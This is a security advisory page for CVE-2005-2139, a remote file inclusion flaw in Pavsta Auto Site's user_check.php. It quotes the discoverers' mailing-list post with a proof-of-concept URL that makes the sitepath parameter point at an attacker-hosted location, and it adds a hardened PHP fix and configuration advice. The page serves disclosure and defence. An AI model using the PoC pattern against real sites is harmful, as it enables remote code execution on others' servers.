SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  Pavsta Auto Site
Vendors:  Pavsta.com
Pavsta Auto Site 'user_check.php' Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014321
SecurityTracker URL:  http://securitytracker.com/id?1014321
CVE Reference:  CVE-2005-2139
Updated:  Jun 24 2008
Original Entry Date:  Jun 29 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Description:  V4mu from [A]nomaly [1]n [T]he [S]ystem CreW discovered a vulnerability in Pavsta Auto Site. A remote user can execute arbitrary commands on the target system.

The 'user_check.php' script includes the 'functions.php' script relative to the user-supplied 'sitepath' parameter without properly validating the parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/user_check.php?sitepath=http://[attacker]

Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.pavsta.com/freescripts.php?action=pavstaautosite
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  skdaemon porra <skdaemon@gmail.com>
Message History:   None.


 Source Message Contents

Date:  Wed, 29 Jun 2005 00:31:59 -0300
From:  skdaemon porra <skdaemon@gmail.com>
Subject:  PavstaAutoSite remote file inclusion

 
 
Bug found by V4mu from A1TS
 
Vulnerable php script: PavstaAutoSite
Released on: 22nd September 2004
Description: Need a Script that does lots of different things?
Including... User System, News System, Message Boards, Private
messaging, Statistics, Admin Panel, Profiles and lots, lots more.....
Well 'The Pavsta Auto Site' does all of this and much more!
 
in user_check.php on line 3:
 
include_once("$sitepath/functions.php");
 
$sitepath is declared in config.php, but in this unique file they don't
include config.php, so $sitepath is just a normal uninitialized
variable that can allow remote attackers to include malicious code:
 
PoC:
 
http://www.target.com/user_check.php?sitepath=http://[attacker]
 
[A]nomaly [1]n [T]he [S]ystem CreW 2oO5
 
greetz to sky  :) 
 
We are:
 
V4mu <*> S0l4r1s <*> r3ckd4ll <*> paulinhu 
 
irc.gigachat.net on #A1TS
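
A hardened form of the include described in the message above, as an added example that is not Pavsta's code and not part of the original post. The flaw depends on PHP creating $sitepath from the request (register_globals) because user_check.php never assigns it, so the sketch assigns the base on the server side and includes only a path that resolves inside the application directory. Assumptions: functions.php sits in the same directory as user_check.php, and resolve_local_include() is a hypothetical helper name.

```php
<?php
// Added example, not Pavsta code: hardened replacement for the top of user_check.php.
//
// Pattern reported in the advisory, kept here only for contrast:
//   include_once("$sitepath/functions.php");   // $sitepath is never assigned in this file

/**
 * Hypothetical helper: resolve "$base/$file" and return its canonical path,
 * or null if it does not exist or lies outside $appRoot.
 */
function resolve_local_include(string $base, string $file, string $appRoot): ?string
{
    $root = realpath($appRoot);
    // realpath() resolves local filesystem paths only. A base that is a URL
    // or stream wrapper (http://, ftp://, php://) does not resolve and gives
    // false, as does a file that does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($root === false || $target === false) {
        return null;
    }

    // The canonical target must sit inside the application root; this also
    // rejects "../" traversal, because realpath() has already collapsed it.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Assign the base unconditionally from a server-side value. Even where PHP
// populates globals from request parameters, this assignment overwrites
// anything supplied as ?sitepath=...
$sitepath = __DIR__; // assumption: functions.php sits beside this script

$functions = resolve_local_include($sitepath, 'functions.php', __DIR__);
if ($functions === null) {
    // Fail closed instead of including an unverified path.
    http_response_code(500);
    exit('functions.php not found inside the application root');
}

// Include the canonical path that was checked, not the original string.
include_once $functions;
```

As defense in depth, keep register_globals off (the setting was removed in PHP 5.4) and leave allow_url_include disabled (available since PHP 5.2, off by default) so include cannot fetch remote URLs at all.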
 



Copyright 2007, SecurityGlobal.net LLC